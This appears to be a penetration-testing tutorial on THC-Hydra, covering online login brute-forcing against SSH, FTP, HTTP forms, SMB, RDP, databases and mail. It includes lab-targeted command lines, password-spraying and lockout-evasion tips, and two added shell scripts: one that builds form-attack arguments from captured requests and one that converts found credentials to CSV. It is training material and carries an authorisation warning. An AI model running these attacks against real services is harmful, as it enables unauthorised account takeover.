What is Hydra?
Hydra (THC-Hydra) is a parallelised online login brute-forcing tool. Unlike John the Ripper and hashcat, which crack password hashes offline, Hydra attacks live services over the network: it repeatedly attempts to authenticate with credentials taken from a wordlist until it finds a valid combination. It supports over 50 protocols, including SSH, FTP, HTTP/HTTPS form logins, SMB, RDP, MySQL, PostgreSQL, VNC, Telnet, IMAP, POP3 and more.
The key strength of Hydra is speed through parallelism — it runs multiple login attempts simultaneously using configurable task threads, making it significantly faster than single-threaded alternatives. This also means it generates substantial traffic and will trigger account lockout policies and IDS alerts, so it should only be used against authorized targets.
Only use against services you own or have explicit written permission to test. Hydra generates a high volume of authentication requests and will be logged. Unauthorized use violates Pakistan's PECA 2016 and international cybercrime laws.
Installation
```bash
# Hydra is pre-installed on Kali Linux
sudo apt update
sudo apt install hydra -y

# Check the version (the banner is the first line of the help output)
hydra -h 2>&1 | head -5

# The full list of supported services is printed at the end of the help text.
# -U shows the usage of one module, e.g. the http-post-form argument syntax
hydra -U http-post-form
```
Core Syntax
Understanding Hydra's syntax is essential. The structure is always `hydra [options] target protocol`, or equivalently `hydra [options] protocol://target[:port]` as in most of the examples below. The `-l` / `-L` and `-p` / `-P` flags select a single value or a wordlist file for the username and password respectively.
```bash
# Single username, wordlist of passwords
hydra -l admin -P /usr/share/wordlists/rockyou.txt TARGET PROTOCOL

# Wordlist of usernames, single password
hydra -L users.txt -p password123 TARGET PROTOCOL

# Both username and password from wordlists (slow: tries every combination)
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt TARGET PROTOCOL

# Single username and single password (credential validation)
hydra -l admin -p admin TARGET PROTOCOL
```
SSH Brute-Force
```bash
# SSH with username wordlist + rockyou
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.40

# SSH with known username, password wordlist
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.40

# SSH on a non-standard port (-s PORT, or write ssh://10.10.10.40:2222)
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.40 -s 2222

# SSH with more parallel tasks (default 16). Against SSH this rarely helps:
# sshd's MaxStartups limit (default 10:30:100) starts dropping unauthenticated
# connections, and Hydra itself warns and recommends -t 4 for ssh
hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 32 ssh://10.10.10.40

# SSH with a wait of N seconds between connection attempts per task,
# to stay under rate limits and lockout thresholds
hydra -l admin -P /usr/share/wordlists/rockyou.txt -W 3 ssh://10.10.10.40
```
FTP & Telnet
```bash
# FTP brute-force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://10.10.10.40

# FTP with verbose output (show each attempt)
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://10.10.10.40 -V

# Telnet
hydra -l admin -P /usr/share/wordlists/rockyou.txt telnet://10.10.10.40
```
HTTP Login Form Brute-Force
HTTP form attacks require the most configuration. You need the path the form posts to, the exact parameter names, and a string that appears in the response on a failed login (`F=`), or alternatively one that appears only on success (`S=`). Hydra compares the whole response, so the failure string must not also occur on a successful login. Forms protected by a per-request CSRF token cannot be attacked this way, because Hydra does not fetch a fresh token for each attempt.
```bash
# HTTP POST form: the module argument has the format
#   hydra -l USER -P WORDLIST TARGET http-post-form "PATH:PARAMS:FAIL_STRING[:OPTIONS]"
#
# PATH        = the URL path of the login form action
# PARAMS      = the POST body with ^USER^ and ^PASS^ as placeholders
# FAIL_STRING = F=<text present in the response when login FAILS>
#               (or S=<text present only when login SUCCEEDS>)
# Colons are field separators: any literal colon inside PARAMS, the match
# string or a header value must be escaped as \:  (see hydra -U http-post-form)

# Example: basic login form
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.40 \
  http-post-form "/login:username=^USER^&password=^PASS^:F=Invalid credentials"

# DVWA login form example
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.40 \
  http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:F=Login failed"

# HTTP GET form (less common). The parameters go in the second field;
# Hydra appends them to PATH as the query string
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.40 \
  http-get-form "/login:user=^USER^&pass=^PASS^:F=Unauthorized"

# HTTPS form (use https-post-form; add -s 8443 for a non-default port)
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.40 \
  https-post-form "/login:user=^USER^&pass=^PASS^:F=Incorrect"

# Send a session cookie with every request (forms behind an existing session).
# The colon after the header name is escaped so it is not read as a separator
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.40 \
  http-post-form "/admin/login:user=^USER^&pass=^PASS^:F=Wrong:H=Cookie\: PHPSESSID=abc123"
```
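Most mistakes with `http-post-form` come from hand-typing the argument: a wrong parameter name, a forgotten cookie or an unescaped colon. The helper below, an added example written for this page and not part of Hydra or DVWA, takes a login request saved from an intercepting proxy, swaps the captured username and password values for `^USER^`/`^PASS^`, carries the session cookie over as an `H=` option, and escapes every literal colon. The request, host and cookie in it are constructed for the demo.

```bash
#!/bin/sh
# Build a Hydra http-post-form argument from a saved login request.
# Example helper written for this page, not part of Hydra or DVWA.

# Constructed sample request, as an intercepting proxy saves it (CRLF endings);
# the host, cookie and field values are made up for the demo.
SAMPLE_REQ=$(printf '%s\r\n' \
  'POST /dvwa/login.php HTTP/1.1' \
  'Host: 10.10.10.40' \
  'Cookie: PHPSESSID=abc123; security=low' \
  'Content-Type: application/x-www-form-urlencoded' \
  'Content-Length: 39' \
  '' \
  'username=test&password=test&Login=Login')

# Hydra splits the module argument on ':', so every literal colon in the
# body, the match string or a header value has to be written as '\:'
escape_colons() {
  printf '%s' "$1" | sed 's/:/\\:/g'
}

# hydra_form_spec USERFIELD PASSFIELD FAILSTRING   (raw request on stdin)
# Prints:  PATH:PARAMS:F=FAILSTRING[:H=Cookie\: <cookie>]
hydra_form_spec() {
  ufield="$1"; pfield="$2"; fail="$3"
  req=$(tr -d '\r')                                   # normalise CRLF
  path=$(printf '%s\n' "$req" | awk 'NR == 1 { print $2 }')
  body=$(printf '%s\n' "$req" | awk 'in_body { print } /^$/ { in_body = 1 }')
  cookie=$(printf '%s\n' "$req" | sed -n 's/^[Cc]ookie: *//p')

  # Swap the captured values for Hydra's placeholders. A leading '&' is
  # prepended so the first parameter matches the same "&name=value" pattern.
  body=$(printf '&%s' "$body" \
    | sed "s/&${ufield}=[^&]*/\\&${ufield}=^USER^/; s/&${pfield}=[^&]*/\\&${pfield}=^PASS^/" \
    | sed 's/^&//')

  spec="${path}:$(escape_colons "$body"):F=$(escape_colons "$fail")"
  if [ -n "$cookie" ]; then
    spec="${spec}:H=Cookie\\: $(escape_colons "$cookie")"
  fi
  printf '%s\n' "$spec"
}

# Demo: turn the sample request into a ready-to-run Hydra command line
spec=$(printf '%s\n' "$SAMPLE_REQ" | hydra_form_spec username password 'Login failed')
printf "hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.40 http-post-form '%s'\n" "$spec"
```

Save the request from the proxy with its original CRLF line endings, pipe it into `hydra_form_spec`, and verify the printed failure string against a real failed response before launching the run; the single quotes around the argument keep the `\:` escapes intact for the shell.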
SMB, RDP & Other Protocols
```bash
# SMB (Windows file shares / domain auth)
hydra -l Administrator -P /usr/share/wordlists/rockyou.txt smb://10.10.10.40

# RDP (Windows Remote Desktop)
hydra -l Administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.40

# MySQL
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://10.10.10.40

# PostgreSQL
hydra -l postgres -P /usr/share/wordlists/rockyou.txt postgres://10.10.10.40

# VNC (password only: classic VNC auth has no username, so no -l/-L)
hydra -P /usr/share/wordlists/rockyou.txt vnc://10.10.10.40

# IMAP email
hydra -l user@target.com -P /usr/share/wordlists/rockyou.txt imap://10.10.10.40

# POP3 email
hydra -l user@target.com -P /usr/share/wordlists/rockyou.txt pop3://10.10.10.40
```
Output & Saving Results
```bash
# Save all found credentials to a file (a comment header plus one line per hit)
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.40 -o found_creds.txt

# Verbose mode: print every attempt (slow but useful for debugging)
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.40 -V

# By default only valid credentials are printed. -I ignores an existing
# hydra.restore file in the current directory and starts fresh instead of
# pausing to ask whether to resume
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.40 -I

# Resume a previously interrupted session (reads ./hydra.restore)
hydra -R
```
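The text written by `-o` is meant for humans; for a report or for feeding the hits into another tool it helps to normalise it. The script below is an added example written for this page, not part of Hydra: it parses the `[port][service] host: ... login: ... password: ...` lines into CSV, keeping passwords that contain spaces or colons intact and treating an empty password correctly. The sample output it runs on is constructed, not a real run.

```bash
#!/bin/sh
# Convert Hydra's text output into CSV for reporting or for other tooling.
# Example helper written for this page, not part of Hydra.

# Constructed sample of what "hydra ... -o found_creds.txt" writes; not a real run.
# Hydra writes a comment header, then one line per valid login found.
SAMPLE_OUT='# Hydra v9.4 run at 2024-01-01 12:00:00 on 10.10.10.40 ssh (hydra -l admin -P rockyou.txt -o found_creds.txt ssh://10.10.10.40)
[22][ssh] host: 10.10.10.40   login: admin   password: letmein
[22][ssh] host: 10.10.10.40   login: deploy   password: deploy
[3306][mysql] host: 10.10.10.41   login: root   password: 
[445][smb] host: 10.10.10.42   login: Administrator   password: P@ss word:1'

# hydra_to_csv: reads Hydra output on stdin, prints host,port,service,login,"password"
# The password is everything after "password: ", so spaces and colons survive;
# it is double-quoted (embedded quotes doubled) to keep the CSV parseable.
hydra_to_csv() {
  awk '
    /^\[[0-9]+\]\[[a-z0-9-]+\] host: / {
      port = $1; sub(/^\[/, "", port); sub(/\].*$/, "", port)
      svc  = $1; sub(/^\[[0-9]+\]\[/, "", svc); sub(/\]$/, "", svc)
      host  = $3
      login = $5
      pw = $0; sub(/^.*   password: ?/, "", pw)
      gsub(/"/, "\"\"", pw)
      printf "%s,%s,%s,%s,\"%s\"\n", host, port, svc, login, pw
    }'
}

# Demo on the constructed sample (normally: hydra_to_csv < found_creds.txt)
printf '%s\n' "$SAMPLE_OUT" | hydra_to_csv
```

Hydra 9.x can also write JSON directly with `-b json` alongside `-o`, which avoids parsing the text format altogether; the parser above is for the default text output and for older runs.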
Common Flags
- `-l <user>`: single username
- `-L <file>`: username wordlist file
- `-p <pass>`: single password
- `-P <file>`: password wordlist file
- `-s <port>`: target port, if non-standard
- `-t <tasks>`: number of parallel connections per target (default 16)
- `-T <tasks>`: total parallel connections across all targets when attacking a host list with `-M` (default 64)
- `-W <seconds>`: wait time between connection attempts, per task
- `-o <file>`: write found credentials to a file
- `-V`: verbose mode, print every login/password attempt
- `-f`: stop after the first valid pair is found (per host when using `-M`)
- `-F`: with `-M`, stop all hosts once a valid pair is found on any host
- `-I`: ignore an existing restore file and start fresh
- `-R`: restore a previous session from `hydra.restore`
- `-e nsr`: additionally try an empty password (n), the username as password (s) and the reversed username (r)
- `-u`: loop around users rather than passwords, so each password is tried against every user before the next password
Password Spraying vs Brute-Force
Standard brute-force (many passwords against one user) trips an account lockout threshold quickly. Password spraying, trying one or two common passwords across many usernames, spreads the attempts so each account sees only one failure per round; it is far stealthier and often more effective against real corporate environments, where a few weak seasonal or default passwords are in use. When supplying a password list, add `-u` so Hydra loops over users first, trying each password against every user before moving to the next password.
```bash
# Password spray: try "Password1" against every user in the list, at a low rate
hydra -L users.txt -p "Password1" ssh://10.10.10.40 -t 4 -W 5

# Try the empty password and username-as-password against all users
hydra -L users.txt -p "" ssh://10.10.10.40 -e ns
```
Common Use Cases
- SSH brute-force after discovering an exposed port 22 during reconnaissance
- HTTP login form attacks on admin panels and web applications
- Testing default credentials on network devices (routers, switches, printers)
- SMB credential testing during internal network assessments
- CTF challenges involving login portals, SSH access, and FTP servers
- Password spray attacks against Active Directory over SMB or RDP
Further Reading
For HTTP form attacks, intercept the login request in Burp Suite first to get the exact field names and failure string before building your Hydra command — guessing the POST parameters is the most common source of errors. Pair Hydra with cewl and cupp for targeted wordlist generation when attacking specific individuals or organizations. Practice on TryHackMe's "Hydra" room and web login challenges on hackzia.site labs.